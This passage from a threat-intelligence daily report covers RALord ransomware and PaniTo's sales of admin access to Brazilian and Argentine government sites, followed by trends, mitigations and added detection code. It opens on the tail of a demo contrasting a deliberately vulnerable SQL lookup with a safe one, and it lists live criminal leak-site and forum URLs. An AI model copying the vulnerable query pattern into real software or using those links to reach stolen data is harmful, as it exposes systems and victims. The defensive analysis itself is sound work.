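    return {
        "leaked_username": leaked[1] if leaked else None,
        "leaked_hash_len": len(leaked[2]) if leaked else 0,
        "blocked": blocked is None,
        "legit_login": verify_password(legit, "correct-horse"),
        "wrong_password": verify_password(legit, "wrong"),
    }


if __name__ == "__main__":
    print(demo())
```

The same split applies to a PHP storefront: bind parameters through the database layer’s prepared statements rather than interpolating request values into query strings. Note that the vulnerable lookup returns the hash and salt to anyone who controls the username field, which is all an IAB needs to list “admin hashes” for sale; the parameterized version returns nothing for the same input.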

Incident 10: HELUKABEL GmbH falls victim to RALord Ransomware

  • Summary: The emerging ransomware group RALord claims to have compromised HELUKABEL GmbH, a company specializing in Electrical & Electronic Manufacturing based in Germany. This incident is categorized as Ransomware. The threat actors allege the exfiltration of 30 Gigabytes (GB) of data and are threatening its publication within 5-6 days via their dedicated leak site on the Tor network.
  • Threat Actor Profile: RALord
  • Background & TTPs: RALord is a new Ransomware-as-a-Service (RaaS) group, with activity first noted around March 25, 2025 [5]. The group operates within the infrastructure of the NOVA RaaS platform, under a typical affiliate revenue split (85% to the affiliate, 15% to the platform operators), but distinctively also offers its encryption tool as a standalone product [5]. RALord employs a multi-faceted extortion strategy built around a Tor-based data leak site (DLS). On this site it not only lists victims and leaks data but also publishes detailed reports about its attacks, sometimes naming security products it claims to have bypassed and highlighting perceived poor security hygiene in the victim organization [5]. This tactic aims to maximize pressure through public humiliation and reputational damage. The group uses at least two ransomware payload variants: one appending the “.nova” extension (likely distributed widely by affiliates) and a more advanced, reportedly Rust-based variant developed in-house by RALord, which appends the “.RALord” extension [5]. Communication with victims often occurs via the qTox messaging application [5]. RALord actively recruits affiliates, seeking individuals with Rust and Python programming skills, CVE exploitation, network penetration, and security bypass techniques [5]. While unconfirmed, links to the older RA World (formerly RA Group) ransomware operation have been suggested on the basis of naming similarities and operational aspects [6]. RA World itself has recently updated its toolset and uses a payload based on the leaked Babuk ransomware source code [32]. The emergence of new groups like RALord, equipped with sophisticated technical capabilities (such as Rust-based payloads) and advanced psychological extortion tactics (detailed public shaming), indicates increasing sophistication and competition within the RaaS landscape [5]. These groups compete not only on the effectiveness of their encryption but also on the creativity and impact of their multi-layered extortion strategies.
  • Operational History & Targets: As a recently emerged group (late March 2025) [5], RALord’s initial list of claimed victims included organizations across sectors such as healthcare, education, hospitality, IT services, media, construction, agriculture, and engineering [5]. Geographically, victims were located in Norway, Portugal, the United Arab Emirates, Saudi Arabia, Taiwan, Brazil, Spain, France, and Argentina [5]. This incident adds Germany to their geographic targets and the Electrical & Electronic Manufacturing sector to their industry victimology.
  • Relevance to Incident: The targeting of a European manufacturing company falls within RALord’s known operational scope for geography and industry sector [5]. The use of a Tor-based leak site with a short publication deadline aligns with its established extortion methodology [5]. The 30 GB exfiltration figure is the actors’ own claim and is unverified; a stated data volume is a standard component of such listings.
  • Incident Details & Potential Impact: A compromise of an electrical and electronic manufacturing company like HELUKABEL GmbH could result in the exposure of highly valuable and sensitive information. This could include proprietary product designs and schematics, detailed manufacturing processes, supplier and customer lists containing confidential business information, internal financial data, and employee PII. The public release or sale of such data could lead to intellectual property theft by competitors, significant competitive disadvantage, disruption to the supply chain, severe reputational damage, and potential regulatory fines, particularly under regimes like GDPR.
  • Evidence:
  • Published URL: http://ralord3htj7v2dkavss2hjzviviwgsf4anfdnihn5qcjl6eb5if3cuqd.onion/HELUKABEL/
  • Screenshots: https://d34iuop8pidsy8.cloudfront.net/68814899-26b6-4e9c-9760-2d9942a289c8.png

Incident 11: Alleged sale of admin access to State Secretariat for Culture and Creative Economy of Rio de Janeiro

  • Summary: The threat actor ‘PaniTo’ is advertising on the darkforums.st platform the sale of administrator-level access to the official website (cultura.rj.gov.br) of the State Secretariat for Culture and Creative Economy of Rio de Janeiro (SECEC-RJ) in Brazil. This incident is categorized as an Initial Access sale. The website is noted as being used for managing cultural policies, events, and funding opportunities within the region.
  • Threat Actor Profile: PaniTo
  • Background & TTPs: ‘PaniTo’ functions as an IAB, specializing in the sale of high-privilege (administrator) access to government websites. Specific intelligence on ‘PaniTo’ is absent from the provided materials; the observable TTP is identifying vulnerabilities in, or compromising credentials for, government web portals and monetizing the result on cybercrime forums such as darkforums.st. Administrator access gives the buyer extensive control over the website’s content and functionality and potentially over associated databases or the underlying server infrastructure [20]. Latin America, including Brazil and Argentina, is a region frequently targeted by cyber threats such as phishing campaigns deploying Remote Access Trojans (RATs) and malware distribution aimed at government and other sectors [33]. Government websites attract IABs because the access is valuable to several kinds of downstream buyer: hacktivists, state-sponsored groups, and financially motivated criminals [20].
  • Operational History & Targets: Specific operational history for ‘PaniTo’ is unknown. Their current identified targets include this Brazilian state government cultural agency website and, as detailed in Incident 12, an Argentinian provincial government website.
  • Relevance to Incident: ‘PaniTo’ is engaging in activity characteristic of an IAB: selling privileged (administrator-level) access to a specific, potentially high-value target (a government website) on a known underground forum [8]. The focus on Latin American government entities aligns with broader threat activity observed in the region [33]. This incident underscores the exposure of public sector digital infrastructure to compromise and subsequent monetization via the IAB market.
  • Incident Details & Potential Impact: Gaining administrator access to a government cultural agency’s website poses significant risks. A malicious actor purchasing this access could deface the site to spread propaganda or misinformation, disrupt the management of cultural events and funding programs, steal sensitive data submitted through the site (such as personal information from grant applicants or artists), or potentially use the compromised website as a pivot point to attack other connected government systems. Such actions could lead to severe reputational damage for the agency, operational chaos, data breaches violating privacy, and an erosion of public trust in government digital services.
  • Evidence:
  • Published URL: https://darkforums.st/Thread-I-sell-Admin-Access-of-cultura-rj-gov-br
  • Screenshots: https://d34iuop8pidsy8.cloudfront.net/030fde54-dd09-489c-b2e5-b653d500422e.png

Incident 12: Alleged sale of admin access to the General Inspection of Legal Entities and Public Registry of Commerce of Chaco Province (Argentina)

  • Summary: The threat actor ‘PaniTo’, also responsible for Incident 11, claims on darkforums.st to be selling administrator access to another government website: the official portal (personasjuridicas.chaco.gov.ar) of the General Inspection of Legal Entities and Public Registry of Commerce of Chaco Province, Argentina. This incident is categorized as an Initial Access sale.
  • Threat Actor Profile: PaniTo
  • Background & TTPs: (Refer to Incident 11 profile) ‘PaniTo’ is identified as an IAB specializing in compromising and selling administrator-level access to government websites in Latin America, using forums like darkforums.st for sales [20].
  • Operational History & Targets: Specific history remains unknown. Current targets demonstrably include government websites in both Brazil (cultural agency) and Argentina (provincial commerce registry). Observing the same IAB offering multiple, similar high-value accesses (admin level to LATAM government sites) concurrently on the same platform provides stronger evidence of the actor’s capabilities and focus. This pattern might suggest the actor has developed specific skills, is exploiting common vulnerabilities across regional government platforms, or is conducting a targeted campaign. It highlights potential systemic weaknesses within the targeted sector or region.
  • Relevance to Incident: This activity is entirely consistent with ‘PaniTo’s’ actions observed in Incident 11, reinforcing their focus on selling high-privilege access to Latin American government digital assets via the same cybercrime forum.
  • Incident Details & Potential Impact: Obtaining administrator access to a government registry responsible for legal entities and commerce presents extremely critical risks. A malicious actor could potentially manipulate official business records, leading to legal chaos and fraud. They could steal sensitive corporate data and personal information submitted during registration processes, disrupt essential registry services relied upon by businesses and legal professionals, potentially issue fraudulent business certificates or approvals, engage in corporate espionage, or cause significant economic and political disruption within the province. The potential for abuse is vast and could severely damage trust in the provincial government’s administrative functions.
  • Evidence:
  • Published URL: https://darkforums.st/Thread-I-sell-Admin-Access-of-personasjuridicas-chaco-gov-ar
  • Screenshots: https://d34iuop8pidsy8.cloudfront.net/3ac2d632-a7ef-422a-88a2-3746cb3c2b99.png

3. Trend Analysis

Analysis of the incidents reported over the past 24 hours reveals several persistent and evolving trends in the cyber threat landscape:

  • Dominance of Ransomware-as-a-Service (RaaS): The continued prominence of the RaaS model is evident, with MEDUSA, NightSpire, and RALord all operating under this structure. The model lowers the barrier to entry for less technically skilled affiliates, enabling widespread attack campaigns, while core developers focus on refining payloads and extortion strategies [1]. The ecosystem shows increasing professionalization, including recruitment for specialized roles (negotiators [3], technical experts [5]) and defined profit-sharing arrangements [1]. The persistence and evolution of RaaS, incorporating advanced payloads (e.g., Rust-based options [5]) and multi-layered extortion [5], suggest it remains a highly effective and profitable criminal business model that will continue to pose a primary threat. Effective defense requires understanding both the TTPs of the core RaaS groups and the common tactics of their affiliates and of the IABs supplying them access.
  • Critical Role of Initial Access Brokers (IABs): Multiple incidents directly involve the sale of network access by IABs (‘Incognito’, ‘Zimmer’, ‘PaniTo’). Furthermore, established RaaS groups like MEDUSA actively recruit IABs to source victims [1]. IABs function as specialists within the cybercrime supply chain, identifying vulnerabilities, gaining unauthorized access, and then commoditizing that access for sale [7]. They provide the foothold required for many damaging attacks, particularly ransomware, letting attackers skip the initial, often time-consuming, intrusion phase [8]. Disrupting the IAB market, through vulnerability management, credential security, and proactive monitoring of illicit forums, is therefore a critical component of hindering the broader cybercrime ecosystem. The semi-public nature of their advertisements (public within criminal circles) offers a potential, albeit challenging, source of early warning for vigilant organizations [22].
  • Cybercrime Forum Resilience and Specialization: Despite periodic law enforcement takedowns and seizures affecting major platforms like RaidForums and successive iterations of BreachForums [10], the ecosystem demonstrates remarkable resilience. New forums emerge, existing ones rebrand or return (e.g., Cracked.io’s reported reemergence [17]), and threat actors quickly migrate. The platforms in this report’s incidents (DarkForums.st, XSS.is, Exploit.in, Leakbase.io) serve as hubs for advertising data leaks, selling initial access, sharing tools and techniques, and facilitating communication and recruitment among threat actors [10]. This resilience underscores the difficulty of permanently dismantling these marketplaces and makes continuous monitoring of active forums a core component of threat intelligence gathering.
  • Prevalence of Multi-Extortion Tactics: The ransomware groups observed in this period (MEDUSA, RALord, NightSpire) consistently use double extortion, combining encryption with the threat of public data leakage [2]. Some, like RALord, add further layers such as detailed public shaming reports that name failed security controls [5]. These approaches increase pressure on victims well beyond the need for data recovery, bringing reputational damage, regulatory penalties, and public embarrassment into play. Defensive strategy must therefore prioritize preventing and detecting data exfiltration alongside preventing encryption, and incident response planning must explicitly cover the public relations, legal, and notification obligations that follow potential data exposure.
  • Diverse and Opportunistic Targeting: The victims identified in this reporting period span a wide range of industry sectors (Government Administration, Consumer Services, Information Services, Automotive, Banking, Non-profit, Manufacturing, E-commerce, Electrical Manufacturing) and geographies (USA, UAE, Vietnam, Egypt, France, Germany, Brazil, Argentina). While some actors show a degree of specialization (e.g., ‘PaniTo’ focusing on Latin American government targets), many RaaS operations, driven by affiliate or IAB activity, appear highly opportunistic, selecting organizations by perceived vulnerability rather than solely by sector or size [1]. This broad targeting reinforces that no sector or region is immune, and organizations of all types must maintain a robust security posture, since opportunistic attacks usually exploit basic security hygiene failures.
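
The early-warning monitoring referred to under the IAB trend above, as an added example that is not code from this report or its cited sources: a watch-list matcher run over constructed forum post records. Watch-list entries and posts are both normalised so that a domain such as cultura.rj.gov.br still matches when a forum thread slug rewrites it as cultura-rj-gov-br (as in the darkforums.st URLs quoted in Incidents 11 and 12) or when a seller defangs it as cultura[.]rj[.]gov[.]br. The post records, the example-corp.com asset and the forum.example URLs are constructed for this example.

```python
"""
Added example (not from the report or its sources): a watch-list matcher
of the kind the IAB early-warning point above calls for, run over
constructed forum post records. Watch-list entries and posts are both
normalised so that a domain such as cultura.rj.gov.br still matches when
a forum thread slug rewrites it as cultura-rj-gov-br or a seller defangs
it as cultura[.]rj[.]gov[.]br. The posts, the example-corp.com asset and
the forum.example URLs are constructed for this example.
"""
import re

# What we are watching for: asset -> human label.
WATCHLIST = {
    "cultura.rj.gov.br": "SECEC-RJ public website",
    "HELUKABEL": "HELUKABEL GmbH (company name)",
    "example-corp.com": "Example Corp primary domain (assumed)",
}

# Constructed post records shaped like the thread URLs quoted in this report.
SAMPLE_POSTS = [
    {"url": "https://darkforums.st/Thread-I-sell-Admin-Access-of-cultura-rj-gov-br",
     "title": "I sell Admin Access of cultura-rj-gov-br", "body": "Admin panel, full control."},
    {"url": "https://forum.example/thread/1", "title": "HELUKABEL GmbH - 30GB",
     "body": "Publication in 5-6 days."},
    {"url": "https://forum.example/thread/2", "title": "Selling RDP access, US company",
     "body": "Domain example-corp[.]com, 200 hosts, DA rights."},
    {"url": "https://forum.example/thread/3", "title": "Combo list April",
     "body": "Nothing of ours here."},
]


def normalize(text):
    """Lower-cases and undoes common defanging so indicators line up."""
    t = text.lower()
    for defanged in ("[.]", "(.)", "{.}", " dot "):
        t = t.replace(defanged, ".")
    return t


def variants(asset):
    """Spellings a forum may use for one asset: as-is, dots as hyphens
    (thread slugs), dots as underscores."""
    a = asset.lower()
    return [a, a.replace(".", "-"), a.replace(".", "_")]


def scan(posts, watchlist=WATCHLIST):
    """Returns one hit per (post, asset) pair, in post order. Matches are
    bounded by non-alphanumerics so 'helukabel' does not fire inside
    'helukabelxyz', while hyphens and slashes still count as boundaries."""
    hits = []
    for post in posts:
        haystack = normalize(" ".join((post["url"], post["title"], post["body"])))
        for asset, label in watchlist.items():
            for v in variants(asset):
                pattern = r"(?<![a-z0-9])" + re.escape(v) + r"(?![a-z0-9])"
                if re.search(pattern, haystack):
                    hits.append({"asset": asset, "label": label,
                                 "matched_as": v, "url": post["url"]})
                    break
    return hits


if __name__ == "__main__":
    for h in scan(SAMPLE_POSTS):
        print(h)
```

In practice the post records would come from a commercial feed or an internal crawler; the matching logic is the part worth keeping, because a plain substring search on the dotted domain misses exactly the slug and defanged spellings that forum threads use.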

4. Mitigation & Recommendations

Based on the observed incidents and trends, the following mitigation strategies and recommendations are advised:

  • Strengthen Credential Security: Implement multi-factor authentication (MFA) across all critical access points, including VPNs, RDP, administrative accounts, email systems, and cloud services [2]. Enforce strong, unique passwords and actively monitor for corporate credentials appearing in data breaches or infostealer logs [9]. Audit user privileges regularly and adhere to the principle of least privilege.
  • Vulnerability and Patch Management: Maintain a rigorous patch management program, prioritizing vulnerabilities in internet-facing systems and in software frequently exploited by threat actors. This includes VPN appliances, RDP services, Microsoft Exchange Servers, web servers, and common web applications/CMS platforms [2]. Run regular vulnerability scanning and penetration testing to find weaknesses proactively.
  • Secure Remote Access: Harden configurations for RDP, VPNs, and other remote access solutions [8]. Disable unnecessary ports and services [2]. Implement strict network traffic filtering rules so that inbound and outbound connections are limited to what is essential [2]. Do not expose RDP directly to the internet; place it behind a VPN or gateway protected by MFA. Monitor remote access logs closely for unusual login patterns, source locations, or timings, in particular bursts of failed logons followed by a success from the same source.
  • Network Segmentation: Design and implement network segmentation to isolate critical systems and data from general user networks and other less sensitive segments [2]. This limits an attacker’s ability to move laterally after an initial compromise and contains the impact of incidents such as ransomware.
  • Defense Against Ransomware TTPs: Deploy and properly configure Endpoint Detection and Response (EDR) capable of identifying and blocking common ransomware TTPs, such as abuse of legitimate tools (living-off-the-land use of PowerShell [1]), process injection, credential theft attempts (e.g., against LSASS), and attempts to disable security software [3]. Maintain updated threat intelligence feeds to block known malicious IP addresses, domains, and file hashes associated with active ransomware campaigns [1]. Implement application control or allow-listing to restrict execution of unauthorized software, including tools commonly used for lateral movement (e.g., PsExec [35]). Maintain regular, tested, offline and ideally immutable backups so that recovery does not depend on paying a ransom [13].
  • Web Application Security: Protect web applications against common vulnerabilities such as SQL injection (as seen in Incident 9) and cross-site scripting (XSS). The primary SQLi control is in the code: use parameterized queries or prepared statements for every database call, never string-built SQL, and run the application’s database account with the minimum privileges it needs. Supplement this with a Web Application Firewall (WAF), regular security code reviews, and application-specific security testing. Restrict file uploads by type and location and keep upload directories non-executable, which blunts the web shell path offered in Incident 9. Keep all web server software, CMS/e-commerce platforms, and their extensions updated.
  • Threat Intelligence Monitoring: Use threat intelligence services or internal capabilities to monitor dark web forums, IAB marketplaces, and data leak sites for mentions of organizational assets, domains, IP addresses, or employee credentials being sold or leaked [22]. Stay informed about the evolving TTPs of prominent ransomware groups and IABs [21].
  • Incident Response Preparedness: Develop, maintain, and regularly exercise a comprehensive incident response plan. It should specifically address ransomware and data breach scenarios, with steps for containment, eradication, recovery, post-incident analysis, and, crucially, communication (internal, external, legal, regulatory) that anticipates double extortion and potential data exposure [2]. Ensure legal counsel experienced in cyber incidents is readily available.
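
The remote access log monitoring recommended above, as an added example that is not code from this report or its cited sources: a small detector that reads RDP-related Windows Security events and flags the trace an Initial Access Broker typically leaves behind, a burst of failed logons (event 4625) from one source followed by a success (event 4624 with logon type 10, RemoteInteractive), plus password spraying (one source failing against several accounts). The log lines are constructed for this example, and the one-line format is an assumption standing in for whatever a SIEM exports.

```python
"""
Added example (not from the report or its cited sources): a detector that
reads RDP-related Windows Security events and flags the trace an Initial
Access Broker typically leaves: a burst of failed logons (event 4625) from
one source followed by a success (event 4624, logon type 10 =
RemoteInteractive), plus password spraying (one source failing against
several accounts). The log lines are constructed for this example and the
one-line format is an assumption standing in for a SIEM export.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

LINE_RE = re.compile(
    r"^(?P<ts>\S+) EventID=(?P<eid>\d+) LogonType=(?P<ltype>\d+) "
    r"Account=(?P<acct>\S+) Src=(?P<src>\S+)$"
)

# Constructed sample: 203.0.113.45 brute-forces three accounts and then
# logs in; 198.51.100.7 is a normal user; 192.0.2.9 is a typo-then-success.
SAMPLE_LOG = """\
2025-04-23T22:01:05Z EventID=4625 LogonType=10 Account=administrator Src=203.0.113.45
2025-04-23T22:01:06Z EventID=4625 LogonType=10 Account=administrator Src=203.0.113.45
2025-04-23T22:01:07Z EventID=4625 LogonType=10 Account=admin Src=203.0.113.45
2025-04-23T22:01:08Z EventID=4625 LogonType=10 Account=backup Src=203.0.113.45
2025-04-23T22:01:09Z EventID=4625 LogonType=10 Account=administrator Src=203.0.113.45
2025-04-23T22:01:10Z EventID=4625 LogonType=10 Account=administrator Src=203.0.113.45
2025-04-23T22:02:30Z EventID=4624 LogonType=10 Account=administrator Src=203.0.113.45
2025-04-23T08:15:00Z EventID=4624 LogonType=10 Account=jdoe Src=198.51.100.7
2025-04-23T09:00:00Z EventID=4625 LogonType=10 Account=jdoe Src=192.0.2.9
2025-04-23T09:00:20Z EventID=4625 LogonType=10 Account=jdoe Src=192.0.2.9
2025-04-23T09:00:40Z EventID=4624 LogonType=10 Account=jdoe Src=192.0.2.9
"""


def parse(lines):
    """Turns log lines into event dicts sorted by time; non-matching lines are skipped."""
    events = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        events.append({
            "ts": datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ"),
            "eid": int(m["eid"]),
            "ltype": int(m["ltype"]),
            "acct": m["acct"].lower(),
            "src": m["src"],
        })
    return sorted(events, key=lambda e: e["ts"])


def detect_bruteforce_then_success(events, fail_threshold=5,
                                   window=timedelta(minutes=10)):
    """Alerts when an RDP success from a source follows >= fail_threshold
    failures from that same source inside the window. Returns a list of alerts."""
    failures = defaultdict(deque)   # src -> timestamps of recent 4625s
    alerts = []
    for ev in events:
        q = failures[ev["src"]]
        while q and ev["ts"] - q[0] > window:     # drop failures outside the window
            q.popleft()
        if ev["eid"] == 4625:
            q.append(ev["ts"])
        elif ev["eid"] == 4624 and ev["ltype"] == 10 and len(q) >= fail_threshold:
            alerts.append({"src": ev["src"], "account": ev["acct"],
                           "failures": len(q), "at": ev["ts"].isoformat()})
            q.clear()
    return alerts


def detect_spray(events, min_accounts=3, window=timedelta(minutes=10)):
    """Alerts when one source fails against >= min_accounts distinct
    accounts inside the window (password spraying). One alert per source."""
    by_src = defaultdict(list)
    for ev in events:
        if ev["eid"] == 4625:
            by_src[ev["src"]].append(ev)
    alerts = []
    for src, fails in by_src.items():
        for i, first in enumerate(fails):
            accts = {e["acct"] for e in fails[i:] if e["ts"] - first["ts"] <= window}
            if len(accts) >= min_accounts:
                alerts.append({"src": src, "accounts": sorted(accts)})
                break
    return alerts


if __name__ == "__main__":
    evs = parse(SAMPLE_LOG.splitlines())
    for a in detect_bruteforce_then_success(evs) + detect_spray(evs):
        print(a)
```

The thresholds are deliberately conservative; the two-failure typo from 192.0.2.9 and the clean logon from 198.51.100.7 produce no alert, while the six failures across three accounts from 203.0.113.45 followed by a type 10 success trip both rules. Tune the window and thresholds to the environment, and treat a hit on an administrative account from an unfamiliar source as a credential-compromise incident rather than a noisy login.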

5. Appendix

Threat Actor Summary Table

The following table provides a consolidated overview of the threat actors identified in the incidents covered within this report, summarizing their type, key characteristics, motivations, and associated platforms. This facilitates a quick comparison and understanding of the diverse roles and methods observed during this reporting period.

Threat Actor | Type | Key TTPs/Characteristics | Primary Motivation | Associated Forums/Platforms | Associated Incidents (JSON Title)
------------ | ---- | ------------------------ | ------------------ | -------------------------- | ---------------------------------
MEDUSA | RaaS | Double Extortion (Blog+Telegram), IAB Recruitment, LOTL/PowerShell, Targets Critical Infrastructure & US Orgs | Financial | s7lmmhlt…onion, Telegram (information support) | Appalachian Regional Commission; Conditioned Air Company
krekti | Data Leaker | Leaks forum data (credentials, PII, IPs) | Reputation/Disruption/Financial? | darkforums.st | Alleged data breach of Breached.fi
Incognito | IAB | Sells RDWeb/VPN access | Financial | xss.is | Alleged sale of unauthorized access to multiple companies
goldshark11 | Data Leaker | Leaks sensitive PII & Financial data (Bank Balances, IDs) | Financial | darkforums.st | Alleged Data Leak of Vietnam Bank
listen0022 | Data Leaker | Leaks PII (Contact Info) from Non-profits | Financial/Reputation? | leakbase.io | Alleged Leak of USA Human Rights Database
KAL EGY 319 | Defacement | Website defacement, Telegram announcement | Notoriety/Hacktivism? | Telegram (KALE3G1Y9) | KAL EGY 319 targets the website of Aqua General
NightSpire | RaaS (Emerging) | Tor Leak Site, Exploits Perimeter Vulns (e.g., FortiOS), Uses Legitimate Tools for Exfil/Evasion | Financial | nspireyz…onion, BreachForums2 (recruitment attempt) | MFR CULTIVONS LES REUSSITES
Zimmer | IAB | Sells E-commerce Admin Access (via SQLi), Offers Web Shell | Financial | exploit.in | Alleged sale of access to an unidentified US OpenCart platform
RALord | RaaS (Emerging) | RaaS (NOVA infra), Standalone Encryptor, Rust Payload Option, Tor DLS with Detailed Shaming Reports, qTox Comms | Financial | ralord3h…onion, Cybercrime Forums (‘ForLord’ user) | HELUKABEL GmbH
PaniTo | IAB | Sells Admin Access to LATAM Government Websites | Financial | darkforums.st | Alleged sale of admin access to SECEC-RJ (Brazil); Alleged sale of admin access to Chaco Gov (Argentina)

Works cited

  1. #StopRansomware: Medusa Ransomware | CISA, accessed April 24, 2025, https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-071a
  2. How to guard against a vicious Medusa ransomware attack – before it’s too late | ZDNET, accessed April 24, 2025, https://www.zdnet.com/article/how-to-guard-against-a-vicious-medusa-ransomware-attack-before-its-too-late/
  3. Ransomware in focus: Meet NightSpire – S-RM, accessed April 24, 2025, https://www.s-rminform.com/latest-thinking/ransomware-in-focus-meet-nightspire
  4. NightSpire Ransomware | WatchGuard Technologies, accessed April 24, 2025, https://www.watchguard.com/wgrd-security-hub/ransomware-tracker/nightspire
  5. RALord Ransomware Group: Threat Profile & Attack Tactics – Cyble, accessed April 24, 2025, https://cyble.com/threat-actor-profiles/ralord-ransomware-group/
  6. ARaaStocracy – RALord ransomware emerges with new DLS – CYJAX, accessed April 24, 2025, https://www.cyjax.com/resources/blog/araastocracy-ralord-ransomware-emerges-with-new-dls/
  7. en.wikipedia.org, accessed April 24, 2025, https://en.wikipedia.org/wiki/Initial_access_broker#:~:text=Initial%20access%20brokers%20(or%20IABs,cybercrime%20as%20a%20service%20economy%22.
  8. Initial access broker – Wikipedia, accessed April 24, 2025, https://en.wikipedia.org/wiki/Initial_access_broker
  9. No, OpenAI Wasn’t Breached—The Real Threat Comes from Infostealers | KELA Cyber, accessed April 24, 2025, https://www.kelacyber.com/blog/openai-breach/
  10. BreachForums – Wikipedia, accessed April 24, 2025, https://en.wikipedia.org/wiki/BreachForums
  11. Medusa Ransomware Turning Your Files into Stone, accessed April 24, 2025, https://unit42.paloaltonetworks.com/medusa-ransomware-escalation-new-leak-site/
  12. Medusa Ransomware on the Rise: From Data Leaks to Multi-Extortion – The Hacker News, accessed April 24, 2025, https://thehackernews.com/2024/01/medusa-ransomware-on-rise-from-data.html
  13. Medusa ransomware: What organizations need to know – ThreatDown by Malwarebytes, accessed April 24, 2025, https://www.threatdown.com/blog/medusa-ransomware-what-organizations-need-to-know/
  14. Feds: Widespread US critical infrastructure targeting conducted by Medusa ransomware, accessed April 24, 2025, https://www.scworld.com/brief/feds-widespread-us-critical-infrastructure-targeting-conducted-by-medusa-ransomware
  15. Breach Forums | Flashpoint, accessed April 24, 2025, https://flashpoint.io/intelligence-101/breach-forums/
  16. BreachForums Seized by FBI: Inside the Notorious Cybercrime Marketplace, accessed April 24, 2025, https://www.kelacyber.com/blog/breachforums-seized-by-fbi-inside-the-notorious-cybercrime-marketplace/
  17. Cracked cybercrime forum reemerges – SC Media, accessed April 24, 2025, https://www.scworld.com/brief/cracked-cybercrime-forum-reemerges
  18. Threat actor is selling data on 5.4 million Twitter users for $30K on hacking forum, accessed April 24, 2025, https://www.bitdefender.com/en-us/blog/hotforsecurity/threat-actor-is-selling-data-on-5-4-million-twitter-users-for-30k-on-hacking-forum
  19. CTA “mud” Actively Leaking K-12 Directories on Breach Forums, accessed April 24, 2025, https://www.cisecurity.org/insights/blog/cta-mud-actively-leaking-k12-directories-on-breach-forums
  20. Initial Access Brokers – Arctic Wolf, accessed April 24, 2025, https://arcticwolf.com/resources/glossary/what-are-initial-access-brokers/
  21. Initial Access Brokers How They’re Changing Cybercrime – CIS Center for Internet Security, accessed April 24, 2025, https://www.cisecurity.org/insights/blog/initial-access-brokers-how-theyre-changing-cybercrime
  22. A Deep-Dive Into Initial Access Brokers: Trends, Statistics, Tactics and more – Cyberint, accessed April 24, 2025, https://cyberint.com/blog/research/a-deep-dive-into-initial-access-brokers-trends-statistics-tactics-and-more/
  23. What are Initial Access Brokers? – Searchlight Cyber, accessed April 24, 2025, https://slcyber.io/blog/what-are-initial-access-brokers/
  24. Initial Access Brokers (IAB) – Flare | Cyber Threat Intel | Digital Risk Protection, accessed April 24, 2025, https://flare.io/glossary/initial-access-brokers/
  25. Initial Access Brokers Are Key to Rise in Ransomware Attacks | Recorded Future, accessed April 24, 2025, https://www.recordedfuture.com/research/initial-access-brokers-key-to-rise-in-ransomware-attacks
  26. Mitigating the Risk of Initial Access Brokers – Searchlight Cyber, accessed April 24, 2025, https://slcyber.io/blog/mitigating-the-risk-of-initial-access-brokers/
  27. How Threat Actors Are Selling Access to Corporate Networks – Constella Intelligence, accessed April 24, 2025, https://constella.ai/selling-access-to-corporate-networks/
  28. special topics in irregular warfare: understanding resistance – usasoc, accessed April 24, 2025, https://www.soc.mil/ARIS/books/pdf/SpecialTopics.pdf
  29. CITY COUNCIL AGENDA – IIS Windows Server, accessed April 24, 2025, https://cms5.revize.com/revize/cityofsedrowoolley/Governing%20Bodies/Council/Packets/2016/20160525_council_packet.pdf
  30. Revealing Emperor Dragonfly: Night Sky and Cheerscrypt – A Single Ransomware Group, accessed April 24, 2025, https://www.sygnia.co/threat-reports-and-advisories/revealing-emperor-dragonfly-a-chinese-ransomware-group/
  31. 2025 Ransomware: Business as Usual, Business is Booming | Rapid7 Blog, accessed April 24, 2025, https://www.rapid7.com/blog/post/2025/04/08/2025-ransomware-business-as-usual-business-is-booming/
  32. From RA Group to RA World: Evolution of a Ransomware Group – Palo Alto Networks Unit 42, accessed April 24, 2025, https://unit42.paloaltonetworks.com/ra-world-ransomware-group-updates-tool-set/
  33. Massive Phishing Campaign Strikes Latin America: Venom RAT Targeting Multiple Sectors, accessed April 24, 2025, https://thehackernews.com/2024/04/massive-phishing-campaign-strikes-latin.html
  34. Grandoreiro Banking Trojan Hits Brazil as Smishing Scams Surge in Pakistan, accessed April 24, 2025, https://thehackernews.com/2024/06/grandoreiro-banking-trojan-hits-brazil.html
  35. What Is Royal Ransomware? – Akamai, accessed April 24, 2025, https://www.akamai.com/glossary/what-is-royal-ransomware
  36. #StopRansomware: Blacksuit (Royal) Ransomware | CISA, accessed April 24, 2025, https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-061a
  37. Ransomware hits hundreds of dentist offices in the US – ZDNET, accessed April 24, 2025, https://www.zdnet.com/article/ransomware-hits-hundreds-of-dentist-offices-in-the-us/